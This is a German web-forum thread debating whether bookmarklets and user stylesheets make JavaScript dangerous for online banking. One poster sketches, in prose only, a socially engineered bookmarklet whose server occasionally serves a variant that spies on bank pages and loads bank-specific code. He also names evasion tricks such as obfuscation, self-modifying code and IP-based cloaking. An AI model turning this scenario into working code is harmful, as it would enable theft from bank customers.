nicht angemeldet Marian
Der Martin
Der Martin
Tim Tepaße
Der Martin
Der Martin
Struppi
Mittlerweile bin ich auf ein Thema gestoßen, wo in der Tat die Aktivierung von JS ein gewisses Risiko darstellt:
Bookmarklets
Das Prinzip ist bestechend: In einem Bookmark gibt man statt eines URLs einen JS-Ausdruck an. Klickt man das Bookmark an, dann wird der JS-Ausdruck ausgeführt.
Man kann den Effekt direkt ausprobieren, indem man z.B. folgenden Ausdruck als URL in den Browser eingibt:
javascript:alert("test")
So weit, so gut.
Riskant wirds aber, wenn der Ausruck z.B. ein Function-Objekt erzeugt, mit Code aus dem Internet lädt und anschließend direkt ausführt.
Das heruntergeladene Skript wird in den Kontext der aktuellen Seite geladen und hat Zugriff auf die zugehörigen Daten. Damit wird es möglich, über einen beliebigen Internetzugriff Daten als Parameter für ein URL an einen beliebigen Server zu senden.
Ich habe jedenfalls für mich beschlossen, daß für die wenigen Gelegenheiten, in denen ich per PIN/TAN auf meine Bankkonten zugreifen muß, eine VMware-5-Maschine mit Linux eingerichtet wird, die für Bankingsessions geklont wird, um sicher zu gehen, daß immer mit einem jungfräulichen Betriebssystem gearbeitet wird. (Das ist erfreulicherweise ein Feature von VMware Workstation 5.)
Ansonsten: NUR HBCI MIT KLASSE-3 CHIPKARTENLESER!
Hallo Houyhnhnm,
Mittlerweile bin ich auf ein Thema gestoßen, wo in der Tat die Aktivierung von JS ein gewisses Risiko darstellt:
Bookmarklets
Das Prinzip ist bestechend: In einem Bookmark gibt man statt eines URLs einen JS-Ausdruck an. Klickt man das Bookmark an, dann wird der JS-Ausdruck ausgeführt.
_Du_ erstellst deine Bookmarks.
Viele Grüße aus Freiburg,
Marian
_Du_ erstellst deine Bookmarks.
Aber üblicherweise guckt kein Unbedarfter, was er sich da für ein Bookmark geladen hat, wenn auf einer schönen Seite ein Angebot steht, ein Bookmark für cooles kleines Helferlein in die Liste aufzunehmen.
Ohne intensive Suche habe ich mehrere solche Teile gefunden, die 1. sehr praktisch sind und 2. auf Internetresourcen zurückgreifen.
Ein Rechtsklick genügt und schwuppdiwupp ist der Code in der Bookmarkliste und man sieht noch nichtmal, was es ist.
Natürlich muß der Anwender das Bookmark anklicken - aber mit entsprechendem social engineering läßt sich eine Menge erreichen. Es sind beileibe nicht nur Deppen, die auf sowas reinfallen...
Moin!
Aber üblicherweise guckt kein Unbedarfter, was er sich da für ein Bookmark geladen hat, wenn auf einer schönen Seite ein Angebot steht, ein Bookmark für cooles kleines Helferlein in die Liste aufzunehmen.
Ohne intensive Suche habe ich mehrere solche Teile gefunden, die 1. sehr praktisch sind und 2. auf Internetresourcen zurückgreifen.
Ein Rechtsklick genügt und schwuppdiwupp ist der Code in der Bookmarkliste und man sieht noch nichtmal, was es ist.
Natürlich muß der Anwender das Bookmark anklicken - aber mit entsprechendem social engineering läßt sich eine Menge erreichen. Es sind beileibe nicht nur Deppen, die auf sowas reinfallen...
Überlege mal, was da alles zusammentreffen muß:
1. Es muß ein einigermaßen interessantes Bookmarklet geschrieben werden, welches tolle Dinge vollbringen kann, so dass es von Leuten installiert wird.
2. Dann muß es zusätzlich noch die bösen Dinge vollbringen können.
3. Außerdem muß es so gestaltet sein, dass man es wissentlich und aktiv auf seiner eigenen Internetbanking-Seite einsetzt. Diese Banking-Seite kann aber nicht manipuliert und mit suggestiven Texten angereichert werden.
4. Außerdem muß man dne bösen Dinge in dem Code so gut verstecken bzw. so unverständlich programmieren, dass sie für eine hinreichend lange Zeit unentdeckt bleiben. Aber gerade Bookmarklets sind doch eher etwas für Freaks, und von denen guckt doch eher mal einer genauer hin. Und da Javascript prinzipiell Open Source ist, kann es gar nicht verborgen bleiben.
Sagen wir mal so: Wer es tatsächlich schafft, sich unwissentlich ein böses Bookmarklet einzufangen, und veranlaßt wird, dieses böse Bookmarklet auch tatsächlich auf seiner Homebanking-Seite zu aktivieren, der würde auch gnadenlos von Phishern reingelegt werden können.
Bedenke außerdem, dass sicherheitsrelevante Dinge wie Accountnummer, PIN oder TAN dem Bookmarklet nur dann zur Verfügung stehen, wenn diese in ein Formularfeld eingetragen, aber noch nicht abgeschickt wurden. Man muß also das Feld ausfüllen und dann erst das Bookmarklet starten. Wie wahrscheinlich ist denn das?
- Sven Rautenberg
Und da Javascript prinzipiell Open Source ist, kann es gar nicht verborgen bleiben.
Das ist zwar ein hier im Forum häufig gelesener Spruch, aber allein davon wird er nicht wahr.
JS bietet wirklich tolle Möglichkeiten, nicht nur die Analyse eines Programmes beliebig kompliziert zu machen, sondern auch den Text so zu verschleiern, daß ein durchschnittlicher Webdesigner damit zumindest sehr ge-, wenn nicht überfordert ist. Durch zusätzliche Serverunterstützung können noch weitere Hürden aufgebaut werden.
hi,
Und da Javascript prinzipiell Open Source ist, kann es gar nicht verborgen bleiben.
Das ist zwar ein hier im Forum häufig gelesener Spruch, aber allein davon wird er nicht wahr.
Braucht er "davon" auch nicht - er ist ja schon wahr.
JS bietet wirklich tolle Möglichkeiten, nicht nur die Analyse eines Programmes beliebig kompliziert zu machen, sondern auch den Text so zu verschleiern, daß ein durchschnittlicher Webdesigner damit zumindest sehr ge-, wenn nicht überfordert ist.
Was hat das damit zu tun, ob der Code einsehbar vorliegt (open source), oder - durch Kompilation o.ä. - nicht (mehr)?
Genau, exakt gar nichts.
gruß,
wahsaga
Was hat das damit zu tun, ob der Code einsehbar vorliegt (open source), oder - durch Kompilation o.ä. - nicht (mehr)?
Dieselben Argumente gelten auch für Maschinencode - einen Disassembler wie z.B. IdaPro und das notwendige Expertenwissen vorausgesetzt.
Im übrigen kann man in JS selbstmodifizierenden Code schreiben - dann wirds richtig haarig... und wenn entprechende zeitliche Restriktionen benutzt werden und Serverunterstützung dazukommt - wenn man also zum debuggen nicht mehr alle Zeit der Welt hat, der Code nur in Fragmenten einsehbar ist und der Server verdacht schöpft und sich mal eben für die betreffende IP-Adresse ganz harmlos benimmt -, dann kann JS auch für Experten eine sehr, sehr schwer zu knackende Nuß abgeben.
Soviel zu Open Source.
Zu den Bookmarklets empfehle ich, einfach mal eine Suchmaschine anzukicken - da gibts wirklich tolle Sachen! Und die Methode ansich bietet auch jede Menge Möglichkeiten, für den Eigenbedarf kleine Helferlein zu schreiben, die im Kontext eines Dokumentes laufen.
Hallo,
Was hat das damit zu tun, ob der Code einsehbar vorliegt (open source), oder - durch Kompilation o.ä. - nicht (mehr)?
Dieselben Argumente gelten auch für Maschinencode - einen Disassembler wie z.B. IdaPro und das notwendige Expertenwissen vorausgesetzt.
Im Prinzip ja - aber da ist es dann einfacher, das Programm einfach auf einem isolierten Testrechner (oder einem virtuellen PC) auszuprobieren und zu protokollieren, was es denn so alles tut oder _zu tun versucht_.
Im übrigen kann man in JS selbstmodifizierenden Code schreiben - dann wirds richtig haarig... und wenn entprechende zeitliche Restriktionen benutzt werden und Serverunterstützung dazukommt - wenn man also zum debuggen nicht mehr alle Zeit der Welt hat, der Code nur in Fragmenten einsehbar ist und der Server verdacht schöpft und sich mal eben für die betreffende IP-Adresse ganz harmlos benimmt -, dann kann JS auch für Experten eine sehr, sehr schwer zu knackende Nuß abgeben.
Richtig. Höchste Zeit, einem solchen Script/Bookmarklet den Rücken zu kehren. Sorry, aber wenn ich trotz einiger Mühe noch nicht genau verstanden habe, was ein JS machen möchte, dann lasse ich es einfach nicht ausführen, dann _bleibt_ es eben gesperrt. Das gleiche gilt, wenn ich es zwar begreife, aber mit der Aktivität des Scripts nicht einverstanden bin.
Zu den Bookmarklets empfehle ich, einfach mal eine Suchmaschine anzukicken - da gibts wirklich tolle Sachen! Und die Methode ansich bietet auch jede Menge Möglichkeiten, für den Eigenbedarf kleine Helferlein zu schreiben, die im Kontext eines Dokumentes laufen.
Das ist an sich nichts neues. Vor allem das Selbst-Schreiben halte ich hier für eine interessante Geschichte.
So long,
Martin
Richtig. Höchste Zeit, einem solchen Script/Bookmarklet den Rücken zu kehren. Sorry, aber wenn ich trotz einiger Mühe noch nicht genau verstanden habe, was ein JS machen möchte, dann lasse ich es einfach nicht ausführen, dann _bleibt_ es eben gesperrt. Das gleiche gilt, wenn ich es zwar begreife, aber mit der Aktivität des Scripts nicht einverstanden bin.
Ich denke, das kann man in eine einfache Regel fassen:
Bookmarklets, die Serverunterstützung anforden, sind per se suspekt.
Mein Motiv, diese Diskussion anzuwerfen war, herauszubekommen, was es mit den Sicherheits-Unkereien i.S. JS wirklich auf sich hat, die man zuweilen aus allen möglichen mehr oder weniger berufenen Mündern hört. Wenn mich jemand danach fragt, will ich einfach eine fundierte Antwort geben können.
Das ist an sich nichts neues. Vor allem das Selbst-Schreiben halte ich hier für eine interessante Geschichte.
Das glaube ich Dir gerne. Ich vermute jedoch, daß dieser Thread auch von Leuten mit weniger Erfahrung mitgelesen wird - für die war die Anregung gedacht.
Frei nach Bert Brecht: "Lesen macht dumm und gewalttätig."
Hallo Houyhnhnm,
Ich denke, das kann man in eine einfache Regel fassen:
Bookmarklets, die Serverunterstützung anforden, sind per se suspekt.
Bookmarklets, die mit javascript: beginnen, sind per se suspekt.
Und dann klickt man halt während dem Onlinebanking nicht auf irgendwelche Bookmarks.
Außerdem wird die URL eines Bookmarks in der Statusleiste angezeigt, wenn man drüberfährt. [1]
Viele Grüße aus Freiburg,
Marian
[1] Zumindest in richtigen Browsern (und im IE macht diese kleine Lücke dann auch nix mehr)
Bookmarklets, die mit javascript: beginnen, sind per se suspekt.
Bookmarklets beginnen per Definition mit javascript: - sonst handelt es sich nämlich nur normale Bookmarks.
Der Begriff Bookmarklet ist ein Acronym aus Bookmark und Applet.
Hallo Houyhnhnm,
Bookmarklets, die mit javascript: beginnen, sind per se suspekt.
Bookmarklets beginnen per Definition mit javascript: - sonst handelt es sich nämlich nur normale Bookmarks.
Der Begriff Bookmarklet ist ein Acronym aus Bookmark und Applet.
Wieder was gelernt ;-) Ich dachte du meinst ein einzelnes Bookmark und hab mich schon gewundert, weil "Bookmark" ja eigentlich reicht.
Viele Grüße aus Freiburg,
Marian
Hallo Houyhnhnm.
Der Begriff Bookmarklet ist ein Acronym aus Bookmark und Applet.
Und da soll noch mal jemand sagen, dass JAVA != JavaScript sei …
Einen schönen Sonntag noch.
Gruß, Ashura
Hallo Ashura,
Der Begriff Bookmarklet ist ein Acronym aus Bookmark und Applet.
Und da soll noch mal jemand sagen, dass JAVA != JavaScript sei …
ja, was hat das miteinander zu tun?
Applet ist ein Diminutiv von Application, also eine kleine Anwendung. Der Ausdruck ist zunächst mal allgemeingültig, auch wenn er vor allem in der Java-Programmierung verwendet wird.
Aber auch die vielen kleinen, mehr oder weniger hilfreichen Progrämmchen, die man mit Windows dazubekommt, ob man es will oder nicht (Notepad, Paint, Wordpad, ...), werden hier und da als Applets bezeichnet.
Also immer schon allgemein bleiben ... ;-)
Ciao,
Martin
Hallo.
Der Begriff Bookmarklet ist ein Acronym aus Bookmark und Applet.
Um genau zu sein: ein Kofferwort.
MfG, at
Außerdem wird die URL eines Bookmarks in der Statusleiste angezeigt, wenn man drüberfährt. [1]
...
[1] Zumindest in richtigen Browsern (und im IE macht diese kleine Lücke dann auch nix mehr)
Dann ist also FireFox 1.0.7 auch kein richtiger Browser - der zeigt nur 'Fertig' an, wenn man über eine JS-haltigen Link in einer Seite fährt.
Hallo,
Ich denke, das kann man in eine einfache Regel fassen:
Bookmarklets, die Serverunterstützung anforden, sind per se suspekt.
Was auch immer man mit dieser Erkenntnis anfangen kann. Die Nützlichkeit meiner sinnvollsten Bookmarlets liegt darin, »Serverunterstützung anzufordern«.
Mathias
hi,
Mein Motiv, diese Diskussion anzuwerfen war, herauszubekommen, was es mit den Sicherheits-Unkereien i.S. JS wirklich auf sich hat,
Und deshalb "unkst" du selbst am meisten herum, und konstruierst ein abstraktes Beispiel, dass von der Mehrzahl der hier Anwesenden - und darunter sicher einige ziemlich "Javascript-Erfahrene" - kaum nachvollzogen, bzw. mit guter Argumentation als praxisfern abgelehnt werden kann ...?
Wenn mich jemand danach fragt, will ich einfach eine fundierte Antwort geben können.
Schon in deinem ersten Thread zum Thema letzte Tage war dein Tonfall eher der eines Advocatus Diaboli, der von allen wirklich argumentativ begründeten Bedenken recht wenig anerkennen wollte.
gruß,
wahsaga
Bookmarklets, die Serverunterstützung anforden, sind per se suspekt.
Mein Motiv, diese Diskussion anzuwerfen war, herauszubekommen, was es mit den Sicherheits-Unkereien i.S. JS wirklich auf sich hat, die man zuweilen aus allen möglichen mehr oder weniger berufenen Mündern hört. Wenn mich jemand danach fragt, will ich einfach eine fundierte Antwort geben können.
Nach wie vor kannst du dir hier http://www.heise.de/security/dienste/browsercheck/ anschauen, welche Sicherheitslücken es gibt und was sie tun und ob dein System davon noch betroffen ist. Die Lücken sind z.T. extrem und haben wenig mit Paranoia zu tun, ich kenn Leute die nicht mehr ins Internet gehen, weil ihr System vollen Dialer, Trojaner usw. ist.
Allerdings sind Skripte, die du lokal auf deinem Rechner ausführst eine andere Sache.
Diese haben z.b. im IE meistens die Rechte des Benutzers, können also Dateien schreiben und lesen, ActiveX Skripte usw., ausführen. Das ist gefährlicher als auf Links in emails klicken, wer nicht weiß das man das nicht tun sollte, sollte vermeiden Sicherheitsrelevante Daten auf seinem Rechner zu haben (und z.b. online Banking betreiben).
Struppi.
Moin!
Mittlerweile bin ich auf ein Thema gestoßen, wo in der Tat die Aktivierung von JS ein gewisses Risiko darstellt:
Bookmarklets
Riskant wirds aber, wenn der Ausruck z.B. ein Function-Objekt erzeugt, mit Code aus dem Internet lädt und anschließend direkt ausführt.
Ist nur die Frage: Wie kommt das Bookmarklet in die Bookmarks?
Richtig: Der User hat es dort absichtlich und wissentlich hineingetan!
Und wie wird das Bookmarklet aktiviert?
Richtig: Der User klickt es absichtlich und wissentlich an!
Das bedeutet: Selbst wenn es ein Bookmarklet gibt, was "ganz böse Sachen[TM]" tun kann, so ist es erstens noch lange nicht auf deinem Rechner als Bookmarklet gespeichert, und selbst wenn du es speicherst, so tut es solange nichts, bis du es nicht aktivierst.
Ich habe jedenfalls für mich beschlossen, daß für die wenigen Gelegenheiten, in denen ich per PIN/TAN auf meine Bankkonten zugreifen muß, eine VMware-5-Maschine mit Linux eingerichtet wird, die für Bankingsessions geklont wird, um sicher zu gehen, daß immer mit einem jungfräulichen Betriebssystem gearbeitet wird. (Das ist erfreulicherweise ein Feature von VMware Workstation 5.)
Da für Homebanking Javascript in den allermeisten Fällen aber wegen des Interfaces aktiv sein muß, hilft dir das nicht wirklich 100% weiter. Woher weißt du denn, dass nicht schon dein Jungfrauenimage böse Javascripte enthält?
Wenn schon paranoid, dann wenigstens richtig!
Ansonsten: NUR HBCI MIT KLASSE-3 CHIPKARTENLESER!
Das bieten die Banken ja leider nicht durchgehend an - etliche wechseln sogar zurück zu PIN/TAN und rücken HBCI nur noch auf energische Anfrage raus. Abgesehen von der Anschaffung des doch recht teuren Chipkartenlesers.
- Sven Rautenberg
Hallo Sven,
Da für Homebanking Javascript in den allermeisten Fällen aber wegen des Interfaces aktiv sein muß, ...
ist das so? Okay, ich verkehre ausschließlich mit der Postbank elektronisch und kann daher über die anderen nichts sagen. Aber die PB braucht zum Glück kein Javascript. Im Gegenteil, ohne lässt es sich sogar mit weniger Belästigung nutzen, weil die auf jeder Seite ein onload="self.focus()" haben (sinngemäß). Das ist ziemlich lästig, wenn man das Fenster, solange es noch lädt, erstmal in den Hintergrund schubst und woanders weitermacht. Und urplötzlich ploppt die Postbank dann in den Vordergrund.
Nö, das muss nicht sein.
Schönen Tag noch,
Martin
Das bedeutet: Selbst wenn es ein Bookmarklet gibt, was "ganz böse Sachen[TM]" tun kann, so ist es erstens noch lange nicht auf deinem Rechner als Bookmarklet gespeichert, und selbst wenn du es speicherst, so tut es solange nichts, bis du es nicht aktivierst.
Du siehst so einem Teil nicht an, was es tatsächlich macht - auch als Experte nicht, oder guckst Du jeden Code erst durch?
Wenn schon paranoid, dann wenigstens richtig!
Na ja - mein Ziel bei der Diskussion, die ich vergangenes Wochenende angestoßen hatte, war herauszubekommen, wie riskant die Sache wirklich ist. Dazu ist es aber immer nützlich, konkrete Konstellationen zu kennen, von denen *u.U.* und vor allem für unbedarfte User eine Gefahr ausgeht.
Das hat weniger mit Paranoja, als mit Gründlichkeit zu tun. Abwiegeln und nennen von Geisteskrankheiten ist auf jeden Fall nicht unbedingt der Sache dienlich.
Die VMware-Maschine schützt vor sowas natürlich nicht - aber sie bietet zumindest einen ziemlich wirksamen Schutzwall gegen allen möglichen anderen Dreck, der sich unbemerkt in einem System einnisten kann.
Moin!
Das bedeutet: Selbst wenn es ein Bookmarklet gibt, was "ganz böse Sachen[TM]" tun kann, so ist es erstens noch lange nicht auf deinem Rechner als Bookmarklet gespeichert, und selbst wenn du es speicherst, so tut es solange nichts, bis du es nicht aktivierst.
Du siehst so einem Teil nicht an, was es tatsächlich macht - auch als Experte nicht, oder guckst Du jeden Code erst durch?
Ich weiß, dass ich als Experte (Software-Projekte für die Industrie und bei SourceForge, staatlich geprüfter Mathematisch-Technischer Assistent, Physikstudent) schon häufig das Rad neu erfunden habe, weil ich fremden Code, der mir vielleicht das Leben erleichert hätte, nicht verstanden habe und mir deshalb eine Anpassung an meine Bedürfnisse zu umständlich erschien. Vielleicht ist das eine negative Eigenschaft, aber wenn ich solchen Code nicht annähernd nachvollziehen kann, dann wird das mit uns beiden (dem Code und mir) nichts.
Wenn schon paranoid, dann wenigstens richtig!
So sieht es aus!
Na ja - mein Ziel bei der Diskussion, die ich vergangenes Wochenende angestoßen hatte, war herauszubekommen, wie riskant die Sache wirklich ist.
Welche Diskussion meinst du, (ZU DIESEM FORUM) Fehler in der Forensoftware? Ich war an dem Wochenende nicht hier.
Dazu ist es aber immer nützlich, konkrete Konstellationen zu kennen, von denen *u.U.* und vor allem für unbedarfte User eine Gefahr ausgeht.
OK, unter dem Aspekt DAU …
Das hat weniger mit Paranoja, als mit Gründlichkeit zu tun. Abwiegeln und nennen von Geisteskrankheiten ist auf jeden Fall nicht unbedingt der Sache dienlich.
Du glaubst gar nicht, was man in Büros und zu Hause alles vor dem Bildschirm sitzen hat, mit dem Unterschied, dass die Leute im Büro Geld verdienen.
Die VMware-Maschine schützt vor sowas natürlich nicht - aber sie bietet zumindest einen ziemlich wirksamen Schutzwall gegen allen möglichen anderen Dreck, der sich unbemerkt in einem System einnisten kann.
Einnisten, du sagst es. Aber die Komprimittierung deines Systems kann die virtuelle Umgebung auch nicht verhindern, sie verhindert lediglich, dass du beim nächsten Start immer noch „verseucht“ bist.
Viele Grüße,
Robert
Hallo,
Mittlerweile bin ich auf ein Thema gestoßen, wo in der Tat die Aktivierung von JS ein gewisses Risiko darstellt:
Bookmarklets
dann sitzt aber die eigentliche Gefahrenquelle auf deinem Stuhl. Überleg mal:
a) Wer legt bei dir Bookmarks an?
b) Wer ruft bei dir Bookmarks ab?
Du müüstest also potentiell schädlichen Code erstmal selber schreiben und dann auch noch selber dessen Ausführung veranlassen. Ich finde es ziemlich weit hergeholt, da eine Gefahr zu wittern.
So long,
Martin
Hallo,
Mittlerweile bin ich auf ein Thema gestoßen, wo in der Tat die Aktivierung von JS ein gewisses Risiko darstellt: Bookmarklets
Ich nutze hier nur selbstgeschriebene, insofern kann ich Deine Paranoia wie auch alle anderen hier nicht nachvollziehen. Aber um Deiner Paranoia noch etwas Futter zu geben – ich tue das ja manchmal gerne – eine vollkommen unterschätzte Gefahrenquelle von JS sind browserseitige Skripte, wie Greasemonkey, Operas UserJS und was es da noch gibt. Oh Jesses! Wir werden alle sterben!
Tim
Hallo,
Aber um Deiner Paranoia noch etwas Futter zu geben – ich tue das ja manchmal gerne – eine vollkommen unterschätzte Gefahrenquelle von JS sind browserseitige Skripte, wie Greasemonkey, Operas UserJS und was es da noch gibt. Oh Jesses! Wir werden alle sterben!
Benutzerstylesheets sind auch nicht ohne: Im Internet Explorer kann man Javascript-Logik en masse in Stylesheets unterbringen, man denke an expression(). Opera vor Version 9 kann auch Dinge wie background-image:url(javascript:...). Shocking!
Mathias
Benutzerstylesheets sind auch nicht ohne: Im Internet Explorer kann man Javascript-Logik en masse in Stylesheets unterbringen, man denke an expression(). Opera vor Version 9 kann auch Dinge wie background-image:url(javascript:...). Shocking!
Interessant - die Frage ist nur, ob einem die von außen untergejubelt werden können, ein ordentliches Maß an Unbedarftheit vorausgesetzt.
Mir scheint doch, eher nicht. Wenn jemandem dazu ein Trick einfällt: Ich bin ganz Ohr...
hi,
Benutzerstylesheets sind auch nicht ohne: [...]
Interessant - die Frage ist nur, ob einem die von außen untergejubelt werden können, ein ordentliches Maß an Unbedarftheit vorausgesetzt.
Mir scheint doch, eher nicht.
Das, was du beim Bookmarklet noch für plausibel hieltest - dass es, obwohl aus zweifelhafter Quelle stammend, vom Nutzer selber eingebunden werden könnte - hältst du jetzt bei Benutzerstylesheets für ziemlich unwahrscheinlich?
Irgendwie bist du ein ziemlicher Wendehals ...
Wenn jemandem dazu ein Trick einfällt: Ich bin ganz Ohr...
Ich biete es dem Nutzer zum Download oder Copy&Paste an, ebenso wie das Bookmarklet.
Wo dürfte der Durchschnittsuser wohl schneller misstrauisch werden - beim Bookmarklet, von dem er evtl. weiß, dass es Javascript-basiert ist - oder beim einem CSS-File, von dem er annimmt, dass es eigentlich nur Formatierungen vornehmen können sollte ...?
gruß,
wahsaga
Hallo wahsaga
Das, was du beim Bookmarklet noch für plausibel hieltest - dass es, obwohl aus zweifelhafter Quelle stammend, vom Nutzer selber eingebunden werden könnte - hältst du jetzt bei Benutzerstylesheets für ziemlich unwahrscheinlich?
Irgendwie bist du ein ziemlicher Wendehals ...
Sollte ich einen Menüpunkt 'User Style Sheet laden' übersehen haben?
Was muß ein Anwender tun, um sich ein user-css einzufangen?
Stell Dir folgendes Szenario vor:
Eine seriös aussehende Website, die mit geschicktem Marketing auf sich aufmerksam macht, bietet neben ~50 anderen, teilweise kostenpflichtigen Angeboten einen Link auf einen wirklich coolen Taschenrechner an - kostenlos! -, der seine Daten aus der aktuellen Website holen und auch wieder dort abladen kann. Gut durchdacht, schön anzusehen, einfach praktisch. Die Funktionsweise des Teils wird sehr anschaulich geschildert, ein kleines interaktives Tutorium etc. pp. Darunter der Tipp, daß Sie dieses nette kleine Helferlein künftig immer griffbereit haben können: Rechtsklick...
Äußerlich sieht der Link aus, wie Milliarden andere Links, nur daß er eben mit 'javascript:' beginnt. Aber das fällt nicht auf, denn man sieht es nur, wenn man ganz gezielt die Eigenschaften des Bookmarks ansieht (und sich nebenbei bei den Browsern eines namhaften Herstellers über die Winzigkeit des Fensterchens ärgern darf, in dem der Wurm angezeigt wird - nur weil die Jungs immer noch nicht begriffen haben, daß heutige Bildschirme deutlich größer als 640x480 sind...)
Doch zurück zu Fritzchen Müller, der auf die Seite gelockt wurde und dem das Ding gefällt. Er benutzt ihn und freut sich, wie schön das Rechnerlein funktioniert, erzählt Freunden davon etc. pp.
Da durch geschicktes Marketing ca. 1000 Fritzchen parallel für unsere seriöse Seite arbeiten, verbreitet sich das Wissen darüber.
Zunächst passiert auch überhaupt nichts - außer daß der Rechner rechnet und mittlerweile mehrere 1000 Fritzchen täglich sich darüber freuen. Dann kommen einige praktische Erweiterungen, u.a. eine Automatisierung für den Accountzugang. Immer noch hat niemand Grund zur Beschwerde. Nur ein ziemlich paranoider Informatiker meldet sich und sagt, das sei gefährlich... aber der wird in einschlägigen Foren von einer Horde begeisterter Fritzen niedergebrüllt.
Unser seriöser Site-Betreiber reibt sich die Hände und sagt seinem JS-Experten, daß jetzt die Stufe 2 des Projektes beginnt: Mit einer Wahrscheinlichkeit von 0,1% soll der Sever eine 'enhanced version' des Rechnerchens schicken, die sich ganz unverbindlich in dem Dokument umsieht, in das er injeziert wurde und wenn es eine Bankseite ist, sich beim Server meldet, um weiteren, auf die jeweilige Bank zugeschnittenen Code nachzuladen.
Den Rest der Geschichte darfst Du Dir selbst zusammenspinnen...
So, aber nun mal ganz ehrlich: Glaubst Du allen ernstes, sowas sei unrealistisch und würde nicht funktionieren?
Gruß Houyhnhnm
PS.: Wenn Du die user-css-Sache in ein ähnliches Geschichtchen packen kannst, hast Du i.S. css gewonnen. Ich bin gespannt.
Stell Dir folgendes Szenario vor:
Du beschreibst hier ein kriminelles vorgehen (zumindest wenn man daraus Kapital schlagen möchte), insofern ist das:
Eine seriös aussehende Website, die mit geschicktem Marketing auf sich aufmerksam macht,
nicht möglich. Solche Leute müssen ihre Identität verschleiern ansonsten sind sie schneller im Knast als sie ihr ergaunertes Geld ausgeben könnten.
Also das was du beschreibst ist durchaus möglich, das ist sogar Realität, durch die Installation deines Betriebssystems hast du dir solch potentielle "Spyware" schon installiert, fast alle Programme dort, könnten dich auspionieren.
... daß heutige Bildschirme deutlich größer als 640x480 sind...)
Das ist Unsinn. Handheld, Mobiltelefone mit Browserfunktion und sonstige Kleincomputer verbreiten sich immer mehr und ich weiß nicht wie du einen 15" Monitor in ein Handy oder Handheld integrieren möchtest.
Struppi.
Du beschreibst hier ein kriminelles vorgehen (zumindest wenn man daraus Kapital schlagen möchte), insofern ist das:
Eine seriös aussehende Website, die mit geschicktem Marketing auf sich aufmerksam macht,
nicht möglich. Solche Leute müssen ihre Identität verschleiern ansonsten sind sie schneller im Knast als sie ihr ergaunertes Geld ausgeben könnten.
Ich glaube, da fehlt Dir einfach etwas Fantasie. Mit dem 0,1%-Trick ist die Entdeckung drastisch erschwert und um jemanden in den Knast zu stecken, mußt Du ihn erst mal haben. Ich denke auch nicht, daß solche Geschichten von einem einzelnen, oder ein paar Ganoven gemacht würden. Das wäre eher so eine Art Geldwäscheprojekt, in das Geld aus anderen Gaunereien investiert würde und durch 'Zufallsbetrügereien' so nebenbei die Rendite verbessert würde.
... daß heutige Bildschirme deutlich größer als 640x480 sind...)
Das ist Unsinn. Handheld, Mobiltelefone mit Browserfunktion und sonstige Kleincomputer verbreiten sich immer mehr und ich weiß nicht wie du einen 15" Monitor in ein Handy oder Handheld integrieren möchtest.
Ich hatte das auch weniger auf Handys gemünzt, als auf Windows XP. Ich wollte, es wäre Unsinn - dann müßte ich mich nicht dauernd über diesen Scheißdreck ärgern.
Ich glaube, da fehlt Dir einfach etwas Fantasie. Mit dem 0,1%-Trick ist die Entdeckung drastisch erschwert und um jemanden in den Knast zu stecken, mußt Du ihn erst mal haben. Ich denke auch nicht, daß solche Geschichten von einem einzelnen, oder ein paar Ganoven gemacht würden. Das wäre eher so eine Art Geldwäscheprojekt, in das Geld aus anderen Gaunereien investiert würde und durch 'Zufallsbetrügereien' so nebenbei die Rendite verbessert würde.
Wie gesagt, wenn du an sowas glaubst, dann darfst du keinen Computer benutzen. Warum sollte jemand der so etwas versucht JS nutzen? Das ist dermaßen eingeschränkt und voller Falstricke, dass das was du vorhast evtl. gar nicht erst klappt. Für dass was du beschriebst gibt es wesentlich einfachere Einfalltore (Bildschirmschoner, Freeware, manipulierte Office Dokumente und und und). Wenn sich das Programm dann noch nach dem Spionieren selber löscht wird's schwer.
Nur hilft es im Falle von Homebanking z.b. nicht viel (zumindest bei meinem Anbieter) da wohl kaum eine Software in der Lage ist, meine TAN Liste auf dem Schreibtisch zu lesen.
Struppi.
Moin!
Nur hilft es im Falle von Homebanking z.b. nicht viel (zumindest bei meinem Anbieter) da wohl kaum eine Software in der Lage ist, meine TAN Liste auf dem Schreibtisch zu lesen.
Nicht die gesamte, aber die TAN, die du gerade eingegeben hast, die kann die Software sehr wohl lesen - und auch abfangen oder umleiten.
- Sven Rautenberg
Hallo Struppi,
Wie gesagt, wenn du an sowas glaubst, dann darfst du keinen Computer benutzen. Warum sollte jemand der so etwas versucht JS nutzen? Das ist dermaßen eingeschränkt und voller Falstricke, dass das was du vorhast evtl. gar nicht erst klappt.
Ganz einfach: Weil JS eine sehr elegante Methode ist, direkt an die Daten in einem Dokument zu kommen.
Codeinjektion ist das Stichwort. Keylogger können nur von außen schnüffeln.
Es ist auch nicht eine Frage von Glauben - es sind nur Erwägungen, was schlimm(st)enfalls möglich ist.
Ich will niemandem Computer madig machen - ich lebe ja selbst nicht schlecht davon. Nur sollte man auch nicht gerade den Kopf in den Sand stecken und sich einreden, das ganze Thema ginge sowieso nur DAUs, also andere an.
Man kann sich ja auch überlegen, wie man seine sensiblen Operationen möglichst gut schützt. Die Idee mit den geklonten virtuellen Maschinen scheint mir nach wie vor nicht abwegig zu sein. Man hat zwar beim Aufsetzen der Urmaschine ein gewisses Risiko, daß da irgendwas drin ist, dabei bleibt es dann aber auch.
Nimmt man ein Betriebssystem mit Geschichte, dann akkumulieren sich diese Risiken mit jeder Benutzung.
Moin!
Wie gesagt, wenn du an sowas glaubst, dann darfst du keinen Computer benutzen. Warum sollte jemand der so etwas versucht JS nutzen? Das ist dermaßen eingeschränkt und voller Falstricke, dass das was du vorhast evtl. gar nicht erst klappt.
Ganz einfach: Weil JS eine sehr elegante Methode ist, direkt an die Daten in einem Dokument zu kommen.
Codeinjektion ist das Stichwort. Keylogger können nur von außen schnüffeln.
Genau hier (und an vielen weiteren Stellen) schlägt allerdings ein Problem im Zusammenhang mit Bookmarklets zu: Du hast nur etwa 500 Zeichen für deinen Code zur Verfügung. Diese experimentell mit einem Internet Explorer ermittelte Tatsache wollte ich nur noch einmal ins Gedächtnis rufen.
Aber falls dein kreiertes Szenario an Bedrohlichkeit zunehmen sollte, wird es dann die Möglichkeit geben, in vernünftigen Browsern Javascripten den Zugriff auf Formularfelder zu verbieten, so wie man heutzutage schon das Verändern der Statuszeile unterbinden kann.
Es ist auch nicht eine Frage von Glauben - es sind nur Erwägungen, was schlimm(st)enfalls möglich ist.
